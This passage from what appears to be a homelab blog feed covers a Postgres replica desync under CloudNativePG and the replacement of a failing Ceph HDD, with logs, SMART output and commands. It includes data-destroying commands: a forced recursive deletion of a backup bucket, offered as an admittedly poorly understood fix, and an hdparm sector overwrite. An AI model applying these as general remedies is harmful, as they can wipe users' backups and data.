</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;FATAL&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;XX000&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;requested timeline 41 is not a child of this server&#39;s history&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;detail&#34;</span>:<span style="color:#e6db74">&#34;Latest checkpoint is at 123/BD0019F0 on timeline 1, but in the
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  history of the requested timeline, the server forked off from that timeline
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  at 5/A90000A0.&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I initially thought that this was due to an error I had seen previously, where
the WALs on the replica&rsquo;s disk somehow got &ldquo;out of sync&rdquo; with the primary and
Postgres was unable to handle that. It sometimes happens during random node
drains, for example. The prescribed solution for the problem is to delete both
the Pod <em>and</em> the volume of the replica. This had helped previously, but didn&rsquo;t
do anything this time. After the replica started up again, I saw the same error
as above. Wondering how it was possible that a completely fresh replica would
suddenly have problems, I went through the logs again and found these lines:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">[...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;error_severity&#34;</span>:<span style="color:#e6db74">&#34;LOG&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;sql_state_code&#34;</span>:<span style="color:#e6db74">&#34;00000&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;message&#34;</span>:<span style="color:#e6db74">&#34;restored log file \&#34;00000002.history\&#34; from archive&#34;</span>
</span></span><span style="display:flex;"><span>  [<span style="color:#960050;background-color:#1e0010">...</span>]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>There were many more messages like this, always with different files. This
indicated to me that the replica was somehow using the backups to get itself up
to speed? And those backups were somehow wrong/broken? I had previously tested
the CNPG backups, most recently after my <a href="https://blog.mei-home.net/posts/cnpg-barman-plugin-migration/">update to the Barman cloud plugin</a>.
And they were working fine for bootstrapping a fresh cluster. So I decided to
nuke them entirely, meaning I deleted the entire content of the directory for the
Harbor cluster in my CNPG backup S3 bucket. Then I deleted the Pod again, and
after a new Pod was created by the CNPG controller, the replica came up without
any further issues.</p>
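<p>In concrete terms, and heavily paraphrased (the bucket prefix follows the
naming pattern from my backup setup, and the Pod name is just an example), the
whole dance boiled down to something like this:</p>
<pre tabindex="0"><code># Wipe the old backup data for this cluster from the CNPG backup bucket
s3cmd del --recursive --force s3://backup-cnpg/harbor-pg-cluster/

# Then let the CNPG controller create a fresh replica Pod
kubectl delete pod -n harbor harbor-pg-cluster-2
</code></pre>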
<p>I&rsquo;m genuinely unsure what&rsquo;s going on here, and I have too little experience with
database management to investigate further. But it looks to me like perhaps
some of the backup files were produced by Postgres 16, the new Postgres 17 replica
was not able to handle them properly, and it consequently ran into a desync?</p>
<p>This also wasn&rsquo;t just a problem specific to the Harbor Postgres cluster. I also
had to do a major update from Postgres 16 to 17 for my Grafana and Woodpecker
clusters, and they showed exactly the same issue. In both cases, deleting the
backups fixed the problem.</p>
<p>On the positive side, none of the above led to any data loss, as the primaries
stayed up and healthy through it all. But the entire episode hasn&rsquo;t exactly
reinforced my trust in CloudNativePG.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Replacing a Broken HDD in my Ceph Cluster</title>
      <link>https://blog.mei-home.net/posts/broken-hdd/</link>
      <pubDate>Mon, 29 Sep 2025 11:20:05 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/broken-hdd/</guid>
      <description>I had to replace a broken HDD in my Ceph cluster</description>
      <content:encoded><![CDATA[<p>Back in July, I was greeted by this error on my Ceph dashboard while visiting
family:
<figure>
    <img loading="lazy" src="ceph-dashboard.png"
         alt="A screenshot of Ceph&#39;s web dashboard. It shows a Ceph error, namely an OSD_SCRUB_ERROR and a PG_DAMAGED error. It shows that the Ceph PG 13.a is inconsistent."/> <figcaption>
            <p>A Ceph error you generally don&rsquo;t want to see while you&rsquo;re 400 km away from your Homelab.</p>
        </figcaption>
</figure>
</p>
<p>This error meant that during the nightly scrub, Ceph detected an error that was
not trivially resolvable.</p>
<p>Ceph knows two kinds of scrubs: normal scrubs and deep scrubs.
Scrubs are run on placement groups, and normal scrubs happen very regularly. They
only compare object sizes and metadata between the primary and the secondary PGs
to ensure they&rsquo;re consistent. Deep scrubs, on the other hand, actually read all of
the data and compare checksums of said data, to make sure that no bits randomly
flipped. These deep scrubs run on a weekly cadence. In my setup, scrubs run
during the night, a couple of PGs per night.</p>
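<p>If you want to check how your own cluster schedules these, the relevant knobs
can be read back from the config store. A quick sketch, using option names as
documented by Ceph:</p>
<pre tabindex="0"><code># When are scrubs allowed to run, and how often do deep scrubs happen?
ceph config get osd osd_scrub_begin_hour
ceph config get osd osd_scrub_end_hour
ceph config get osd osd_deep_scrub_interval
</code></pre>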
<p>This was the first time I saw these errors, so I looked at the <a href="https://docs.ceph.com/en/reef/rados/operations/health-checks/#pg-damaged">Ceph docs</a>. I followed
the links to the docs on <a href="https://docs.ceph.com/en/reef/rados/troubleshooting/troubleshooting-pg/#pgs-inconsistent">handling the error</a>.</p>
<p>The first goal was to figure out what the actual error was, and on which of the
six storage devices in my Ceph cluster it actually appeared. To figure that out,
I used the following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph rados list-inconsistent-obj 13.a --format<span style="color:#f92672">=</span>json-pretty
</span></span></code></pre></div><p>The command produced the following output:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>  {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;epoch&#34;</span>: <span style="color:#ae81ff">9294</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;inconsistents&#34;</span>: [
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;object&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;db0c7d6a-8b8b-48d5-85d8-f7f77dfac9eb.45990501.1_cache/media_attachments/files/114/881/148/093/347/525/original/8dd522a014922e6a.png&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;nspace&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;locator&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;snap&#34;</span>: <span style="color:#e6db74">&#34;head&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;version&#34;</span>: <span style="color:#ae81ff">567448</span>
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;errors&#34;</span>: [],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;union_shard_errors&#34;</span>: [
</span></span><span style="display:flex;"><span>                <span style="color:#e6db74">&#34;read_error&#34;</span>
</span></span><span style="display:flex;"><span>            ],
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;selected_object_info&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;oid&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;oid&#34;</span>: <span style="color:#e6db74">&#34;db0c7d6a-8b8b-48d5-85d8-f7f77dfac9eb.45990501.1_cache/media_attachments/files/114/881/148/093/347/525/original/8dd522a014922e6a.png&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;key&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;snapid&#34;</span>: <span style="color:#ae81ff">-2</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;hash&#34;</span>: <span style="color:#ae81ff">2980556234</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;max&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;pool&#34;</span>: <span style="color:#ae81ff">13</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;version&#34;</span>: <span style="color:#e6db74">&#34;9488&#39;567448&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;prior_version&#34;</span>: <span style="color:#e6db74">&#34;0&#39;0&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;last_reqid&#34;</span>: <span style="color:#e6db74">&#34;client.63557317.0:20953500&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;user_version&#34;</span>: <span style="color:#ae81ff">567448</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;mtime&#34;</span>: <span style="color:#e6db74">&#34;2025-07-19T17:46:47.050900+0000&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;local_mtime&#34;</span>: <span style="color:#e6db74">&#34;2025-07-19T17:46:47.063177+0000&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;lost&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;flags&#34;</span>: [
</span></span><span style="display:flex;"><span>                    <span style="color:#e6db74">&#34;dirty&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#e6db74">&#34;data_digest&#34;</span>
</span></span><span style="display:flex;"><span>                ],
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;truncate_seq&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;truncate_size&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;data_digest&#34;</span>: <span style="color:#e6db74">&#34;0xb75fd373&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;omap_digest&#34;</span>: <span style="color:#e6db74">&#34;0xffffffff&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;expected_object_size&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;expected_write_size&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;alloc_hint_flags&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;manifest&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;watchers&#34;</span>: {}
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;shards&#34;</span>: [
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;osd&#34;</span>: <span style="color:#ae81ff">3</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;primary&#34;</span>: <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;errors&#34;</span>: [],
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;omap_digest&#34;</span>: <span style="color:#e6db74">&#34;0xffffffff&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;data_digest&#34;</span>: <span style="color:#e6db74">&#34;0xb75fd373&#34;</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;osd&#34;</span>: <span style="color:#ae81ff">7</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;primary&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;errors&#34;</span>: [
</span></span><span style="display:flex;"><span>                        <span style="color:#e6db74">&#34;read_error&#34;</span>
</span></span><span style="display:flex;"><span>                    ],
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>
</span></span><span style="display:flex;"><span>                }
</span></span><span style="display:flex;"><span>            ]
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The first good news from this info was that it showed which object the error
occurred in: <code>db0c7d6a-8b8b-48d5-85d8-f7f77dfac9eb.45990501.1_cache/media_attachments/files/114/881/148/093/347/525/original/8dd522a014922e6a.png</code>.
So that&rsquo;s fine - that&rsquo;s only an object in the media cache of my Mastodon instance.
The important piece of the information was the <code>shards</code> object at the end:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;shards&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;osd&#34;</span>: <span style="color:#ae81ff">3</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;primary&#34;</span>: <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;errors&#34;</span>: [],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;omap_digest&#34;</span>: <span style="color:#e6db74">&#34;0xffffffff&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;data_digest&#34;</span>: <span style="color:#e6db74">&#34;0xb75fd373&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;osd&#34;</span>: <span style="color:#ae81ff">7</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;primary&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;errors&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;read_error&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>It shows which OSD the error occurred on, guiding me to the HDD in one of my
Ceph machines.</p>
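<p>Mapping an OSD ID to the physical machine and disk can also be done from the
Ceph side, which is handy if you don&rsquo;t remember which OSD lives where:</p>
<pre tabindex="0"><code># Which host and CRUSH location does OSD 7 live in?
ceph osd find 7

# Which physical device backs the osd.7 daemon?
ceph device ls-by-daemon osd.7
</code></pre>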
<p>Logging into the machine and looking at <code>dmesg</code>, I was greeted with this error:</p>
<pre tabindex="0"><code>[1505504.381650] ata6.00: exception Emask 0x0 SAct 0x1780000 SErr 0x0 action 0x0
[1505504.381682] ata6.00: irq_stat 0x40000008
[1505504.381728] ata6.00: failed command: READ FPDMA QUEUED
[1505504.381738] ata6.00: cmd 60/00:98:e0:6e:c8/01:00:13:00:00/40 tag 19 ncq dma 131072 in
                          res 41/40:00:c8:6f:c8/00:00:13:00:00/00 Emask 0x409 (media error) &lt;F&gt;
[1505504.381764] ata6.00: status: { DRDY ERR }
[1505504.381772] ata6.00: error: { UNC }
[1505504.384181] ata6.00: configured for UDMA/133
[1505504.384269] sd 5:0:0:0: [sdc] tag#19 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_OK cmd_age=3s
[1505504.384281] sd 5:0:0:0: [sdc] tag#19 Sense Key : Medium Error [current] 
[1505504.384289] sd 5:0:0:0: [sdc] tag#19 Add. Sense: Unrecovered read error - auto reallocate failed
[1505504.384298] sd 5:0:0:0: [sdc] tag#19 CDB: Read(16) 88 00 00 00 00 00 13 c8 6e e0 00 00 01 00 00 00
[1505504.384303] I/O error, dev sdc, sector 331902920 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0
[1505504.384362] ata6: EH complete
</code></pre><p>Well, that was definitely a hardware error. Being 400 km away from the broken
disk, I decided to see whether it could be fixed by reallocating the sector.</p>
<p>For a long time, HDDs have come with a few spare sectors on the platters, in case
a sector gets damaged. The firmware would mark a sector as damaged and instead
use a sector from this spare area as a replacement.</p>
<p>After googling around a lot, I found that normally, this sector reallocation can
be triggered by overwriting the damaged sector with new data. Overwriting signals
to the HDD&rsquo;s firmware that I don&rsquo;t care about the previous data anymore, in which
case it will mark the sector as bad and reallocate it. It can&rsquo;t just do that on a
failed read, because I might still have wanted to try to access the data in the
sector and salvage it.</p>
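<p>Before resorting to a write, the suspect sector can also be read directly to
confirm that it really is the one throwing errors. A small sketch, using the
sector number from the dmesg output above:</p>
<pre tabindex="0"><code># Reading the suspect sector directly should reproduce the I/O error
hdparm --read-sector 331902920 /dev/sdc
</code></pre>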
<p>A direct write to a sector is inherently dangerous. The data there will be
completely overwritten, obviously.</p>
<p><strong>Only do the following if you really don&rsquo;t care about the data there anymore!</strong></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>hdparm --yes-i-know-what-i-am-doing --write-sector <span style="color:#ae81ff">331902920</span> /dev/sdc
</span></span></code></pre></div><p>The sector number comes from the dmesg error message.
Please note the <code>--yes-i-know-what-i-am-doing</code> and make sure you really do!</p>
<p>This seemed to fix the error, as after a re-run of the scrub, I was not getting
any read errors anymore.
An immediate deep scrub of a PG can be triggered like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph pg deep-scrub 13.a
</span></span></code></pre></div><p>After that, the Ceph cluster error also disappeared. I decided that I&rsquo;ve got a
replication factor of two for all of my data anyway, plus backups. So I would
wait for another error to show up before switching out the HDD. And that worked
for another two months.</p>
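<p>Worth keeping an eye on afterwards are the SMART counters for pending and
reallocated sectors, which tell you whether the firmware actually swapped the
sector out:</p>
<pre tabindex="0"><code># Current_Pending_Sector should drop back to 0; Reallocated_Sector_Ct may go up
smartctl -A /dev/sdc | grep -E 'Reallocated_Sector_Ct|Current_Pending_Sector|Offline_Uncorrectable'
</code></pre>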
<h2 id="switching-out-the-disk">Switching out the disk</h2>
<p>On September 20th, I got a very similar error, again on the same disk. I initially
tried the same approach as before, overwriting the damaged sector to trigger a
reallocation and then re-running the deep scrub in Ceph. But this time, the
approach did not work. Instead it produced additional read errors in neighboring
sectors. I ran three scrubs, and got read errors for different sectors in each
of them.</p>
<p>At that point I decided to replace the disk. Here is the disk&rsquo;s <code>smartctl -a</code>
output:</p>
<pre tabindex="0"><code>smartctl 7.4 2023-08-01 r5530 [x86_64-linux-6.8.0-79-generic] (local build)
Copyright (C) 2002-23, Bruce Allen, Christian Franke, www.smartmontools.org

=== START OF INFORMATION SECTION ===
Model Family:     Western Digital Red
Device Model:     WDC WD40EFRX-68N32N0
Serial Number:    WD-WCC7K6EE326H
LU WWN Device Id: 5 0014ee 20f9d1545
Firmware Version: 82.00A82
User Capacity:    4,000,787,030,016 bytes [4.00 TB]
Sector Sizes:     512 bytes logical, 4096 bytes physical
Rotation Rate:    5400 rpm
Form Factor:      3.5 inches
Device is:        In smartctl database 7.3/5528
ATA Version is:   ACS-3 T13/2161-D revision 5
SATA Version is:  SATA 3.1, 6.0 Gb/s (current: 6.0 Gb/s)
Local Time is:    Sat Sep 20 09:29:43 2025 CEST
SMART support is: Available - device has SMART capability.
SMART support is: Enabled

=== START OF READ SMART DATA SECTION ===
SMART overall-health self-assessment test result: PASSED

General SMART Values:
Offline data collection status:  (0x00)	Offline data collection activity
                                      was never started.
                                      Auto Offline Data Collection: Disabled.
Self-test execution status:      ( 113)	The previous self-test completed having
                                      the read element of the test failed.
Total time to complete Offline 
data collection: 		(45360) seconds.
Offline data collection
capabilities: 			 (0x7b) SMART execute Offline immediate.
                                      Auto Offline data collection on/off support.
                                      Suspend Offline collection upon new
                                      command.
                                      Offline surface scan supported.
                                      Self-test supported.
                                      Conveyance Self-test supported.
                                      Selective Self-test supported.
SMART capabilities:            (0x0003)	Saves SMART data before entering
                                      power-saving mode.
                                      Supports SMART auto save timer.
Error logging capability:        (0x01)	Error logging supported.
                                      General Purpose Logging supported.
Short self-test routine 
recommended polling time: 	 (   2) minutes.
Extended self-test routine
recommended polling time: 	 ( 482) minutes.
Conveyance self-test routine
recommended polling time: 	 (   5) minutes.
SCT capabilities: 	       (0x303d)	SCT Status supported.
                                      SCT Error Recovery Control supported.
                                      SCT Feature Control supported.
                                      SCT Data Table supported.

SMART Attributes Data Structure revision number: 16
Vendor Specific SMART Attributes with Thresholds:
ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
1 Raw_Read_Error_Rate     0x002f   200   200   051    Pre-fail  Always       -       0
3 Spin_Up_Time            0x0027   253   164   021    Pre-fail  Always       -       1775
4 Start_Stop_Count        0x0032   100   100   000    Old_age   Always       -       41
5 Reallocated_Sector_Ct   0x0033   200   200   140    Pre-fail  Always       -       0
7 Seek_Error_Rate         0x002e   100   253   000    Old_age   Always       -       0
9 Power_On_Hours          0x0032   018   018   000    Old_age   Always       -       59917
10 Spin_Retry_Count        0x0032   100   253   000    Old_age   Always       -       0
11 Calibration_Retry_Count 0x0032   100   253   000    Old_age   Always       -       0
12 Power_Cycle_Count       0x0032   100   100   000    Old_age   Always       -       39
192 Power-Off_Retract_Count 0x0032   200   200   000    Old_age   Always       -       19
193 Load_Cycle_Count        0x0032   197   197   000    Old_age   Always       -       10581
194 Temperature_Celsius     0x0022   119   101   000    Old_age   Always       -       31
196 Reallocated_Event_Count 0x0032   200   200   000    Old_age   Always       -       0
197 Current_Pending_Sector  0x0032   200   200   000    Old_age   Always       -       1
198 Offline_Uncorrectable   0x0030   100   253   000    Old_age   Offline      -       0
199 UDMA_CRC_Error_Count    0x0032   200   200   000    Old_age   Always       -       1
200 Multi_Zone_Error_Rate   0x0008   100   253   000    Old_age   Offline      -       0
</code></pre><p>I bought the disk in late 2018, and it has been running continuously since then.</p>
<p>For the disk replacement, I used the emergency HDD I keep in storage for just
such an occasion as this. The new disk is an 8TB Seagate IronWolf, in the 5400 RPM
variant.</p>
<p>For the replacement, I followed <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Advanced/ceph-osd-mgmt/#remove-an-osd">these instructions</a>.</p>
<p>But those don&rsquo;t really work.</p>
<p>Let me explain. I started out by removing the disk from the Ceph cluster CRD.
I don&rsquo;t have automated OSD creation enabled, so I&rsquo;ve got a list of storage
devices in my cluster CRD, and I removed the entry of the broken HDD:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;ceph3&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x50014ee20f9d1545&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span></code></pre></div><p>As the docs state, I started by scaling down the Rook operator:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n rook-ceph scale deployment rook-ceph-operator --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>Then I scaled down the deployment of the broken OSD as well:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n rook-ceph scale deployment rook-ceph-osd-7 --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>The next command is then supposed to be given via the rook-ceph <a href="https://github.com/rook/kubectl-rook-ceph">kubectl plugin</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl rook-ceph rook purge-osd <span style="color:#ae81ff">7</span>
</span></span></code></pre></div><p>That command is supposed to take the OSD out of the cluster and wait for rebalancing
to finish before then destroying the OSD.
But this didn&rsquo;t work, the command failed with this error:</p>
<pre tabindex="0"><code>Info: waiting for pod with label &#34;app=rook-ceph-operator&#34; in namespace &#34;rook-ceph&#34; to be running
</code></pre><p>So it looks like the command needs the operator to run? But at the same time, the
docs seem to state that I have to take down the operator first? I&rsquo;m not getting it.</p>
<p>Anyway, I started up the operator again and then executed the command a second time.
This triggered the rebalancing to the remaining OSDs and I went and did some other
things.</p>
<p>Okay, that was a lie. &#x1f605;
I continuously watched the Ceph dashboard and my Ceph Grafana dashboard of course. &#x1f601;</p>
<p>After about twelve hours of rebalancing, I realized that I might not have enough
space on the two remaining OSDs, with the OSD overview on the Ceph dashboard
looking like this:</p>
<figure>
    <img loading="lazy" src="osd-view-almost-full.png"
         alt="A screenshot of the Ceph dashboard&#39;s OSD overview. It shows one HDD OSD as out and down, with the two remaining HDD OSDs at 88% and 78% utilization."/> <figcaption>
            <p>I had forgotten to calculate whether I actually had enough space for all of the data to fit onto only two HDDs</p>
        </figcaption>
</figure>

<p>That was when I decided to just replace the disk, instead of waiting for the
rebalance to finish.</p>
<p>While doing so, I had another confirmation that I&rsquo;m just utterly incompetent when
it comes to doing things in the physical world:
<figure>
    <img loading="lazy" src="bad-install.jpg"
         alt="A picture of an HDD installed into a drive caddy. Notably, the HDD&#39;s connectors point towards the ventilation grill at the front of the caddy, instead of the open back."/> <figcaption>
            <p>No comment.</p>
        </figcaption>
</figure>

Well, at least I realized my mistake before I installed the thing in the server.</p>
<p>After installing the new disk into the server, I added it to the Ceph Cluster CRD,
triggering the creation of the Kubernetes deployment. The first thing I noted was
that the new OSD didn&rsquo;t have a device class set:</p>
<pre tabindex="0"><code>ceph osd tree
ID   CLASS  WEIGHT    TYPE NAME         STATUS  REWEIGHT  PRI-AFF
 -1         17.28386  root default
-10          4.54839      host ceph1
  6    hdd   3.63869          osd.6         up   1.00000  1.00000
  5    ssd   0.90970          osd.5         up   1.00000  1.00000
 -7          4.54839      host ceph2
  3    hdd   3.63869          osd.3         up   1.00000  1.00000
  2    ssd   0.90970          osd.2         up   1.00000  1.00000
-13          8.18709      host ceph3
  0          7.27739          osd.0         up   1.00000  1.00000
  4    ssd   0.90970          osd.4         up   1.00000  1.00000
</code></pre><p>Note how <code>osd.0</code> is missing the <code>CLASS</code>. I&rsquo;m not sure what&rsquo;s going wrong here.
I did configure the class in the Ceph Cluster entry:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;ceph3&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x5000c500e6f9fde3&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span></code></pre></div><p>I fixed the issue with this command:</p>
